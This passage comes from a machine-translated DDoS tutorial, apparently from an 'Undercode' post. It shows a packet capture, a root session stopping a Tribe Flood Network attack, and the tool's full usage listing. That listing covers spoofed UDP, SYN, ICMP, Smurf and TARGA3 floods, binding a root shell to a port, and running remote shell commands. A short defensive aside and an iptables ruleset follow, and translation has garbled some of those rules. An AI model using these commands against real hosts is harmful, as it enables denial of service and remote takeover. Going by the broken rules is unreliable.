08 : 03: 36.524944 36.235.130.0> 192.168.0.5: icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 ed6e 24eb 8200 E..e ... n $ ...
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ......
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08: 03: 36.524984 192.168.0.5> 36.235.130.0: icmp: echo reply
0x0000 4500 005c 551c 0000 4001 bdef c0a8 0002 E..U ... @ .......
0x0010 24eb 8200 0000 ffff 0000 0000 0000 0000 $ ..................
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......

　

　　[root @ master root ] ./ tfn -f host.txt -c 0 Stop attack


　　　　Protocol: random
　　　　Source IP: random
　　　　Client input: list
　　　　Command: stop flooding

Password verification:

Sending out packets: ...

　　Of course, there are other attack methods. You can change the attack method by using -c X.


　 [root @ master root ] ./ tfn
　　 usage: ./tfn
[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.
　　　　　　　　Uses a random protocol as default
[-D n] Send out n bogus requests for each real one to decoy targets
[-S host / ip] Specify your source IP. Randomly spoofed by default, you need
　　　　　　　　to use your real IP if you are behind spoof-filtering routers
[-f hostlist] Filename containing a list of hosts with TFN servers to contact
[-h hostname] To contact only a single host running a TFN server
[-i target string] Contains options / targets separated by '@', see below
[-p port] A TCP destination port can be specified for SYN floods
<- c command ID> 0-Halt all current floods on server (s) immediately
　　　　　　　　1-Change IP antispoof-level (evade rfc2267 filtering)
　　　　　　　　　　usage: -i 0 (fully spoofed) to -i 3 (/ 24 host bytes spoofed)
　　　　　　　　2- Change Packet size, usage: -i
　　　　　　　　3-Bind root shell to a port, usage: -i
　　　　　　　　4-UDP flood, usage: -i victim @ victim2 @ victim3 @ ...
　　　　　　　　5-TCP / SYN flood, usage: -i victim @ ... [-p destination port]
　　　　　　　　6-ICMP / PING flood, usage: -i victim @ ...
　　　　　　　　7-ICMP / SMURF flood, usage: -i victim @ broadcast @ broadcast2 @ ...
　　　　　　　　8-MIX flood (UDP / TCP / ICMP interchanged), usage: -i victim @ ...
　　　　　　　　9-TARGA3 flood (IP stack penetration ), Usage: -i victim @ ...
　　　　　　　　10 - blindly the Execute Remote shell the Command, the Command Usage -i

four defensive approach.

　　Like the internet, like all presentations DDOS article, DDOS hard to detect, I try to filter out all icmp packet firewall, To protect my mainframe, but what I realized was that my mainframe crashed later. Hey ~, do n’t expect me to guard against DDOS, if I can guard against it, I do n’t have to sleep: (

　　still the old saying, we can do What we do is to try our best not to make our host a proxy for others to attack, and to strictly restrict the intranet intranet travel, try not to harm others, as long as everyone does this, our network environment can be safer, at least, I You can sleep peacefully for a few days.

　　Attach a part of my firewall. It is mainly for ICMP / PING, but it is not very useful: (

/ sbin / iptables -P INPUT DROP
/ sbin / iptables -A INPUT -i lo -p all -j ACCEPT
/ sbin / iptabl es -A INPUT -i eth1 -p icmp -j ACCEPT
/ sbin / iptables -A INPUT -p icmp --icmp-type 8 -j DROP
/ sbin / iptables -A INPUT -s 127.0.0.2 -i lo -j ACCEPT
/ sbin / iptables -A INPUT -s 127.0.0.2- i eth0 -j DROP
/ sbin / iptables -A INPUT -s $ LAN_NET / 24 -i eth0 -j DROP
/ sbin / iptables -A INPUT -s 172.16.0.0/12 -i eth0 -j DROP
/ sbin / iptables -A -j -i eth0 -s 10.0.0.0/8 the INPUT the DROP
/ sbin / iptables -A limit the INPUT -i eth0 -m --limit. 1 / sec
--limit-Burst. 5 -j ACCEPT / sbin / iptables -A the INPUT
- i eth0 -p udp -m state --state NEW -j REJECT
/ sbin / iptables -A INPUT -p tcp --dport 22 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp --dport 80 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp -i eth1 --dport 53 -j ACCEPT
/ sbin / iptables -A INPUT -p udp -i eth1 --dport 53 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp -i eth0 -m state
--state ESTABLISHED, RELATED -m tcp --dport 1024: -j ACCEPT
/ sbin / iptables -A INPUT -p udp -i eth0 -m state
--state ESTABLISHED, RELATED -m udp --dport 1024: -j ACCEPT
/ sbin / iptables -A INPUT -p icmp --icmp- type echo-request
-j LOG --log-level 2
/ sbin / iptables -A INPUT -i eth0 -p icmp --icmp-type
echo-request -j DROP
/ sbin / iptables -A INPUT -p tcp -m multiport
--destination-port 135,137,138,139 -j LOG
/ sbin / iptables -A INPUT -p udp -m multiport
--destination-port 135,137,138,139 -j LOG
/ sbin / iptables -A INPUT -i eth0 -p tcp --dport 2000 -j ACCEPT
/ sbin / iptables -A INPUT -i eth0 -p tcp --dport 2001 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp -i eth1 -m state --state
ESTABLISHED, RELATED -m tcp --dport 1024: -j ACCEPT The

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 This full ddos tutorial, powered by deepweb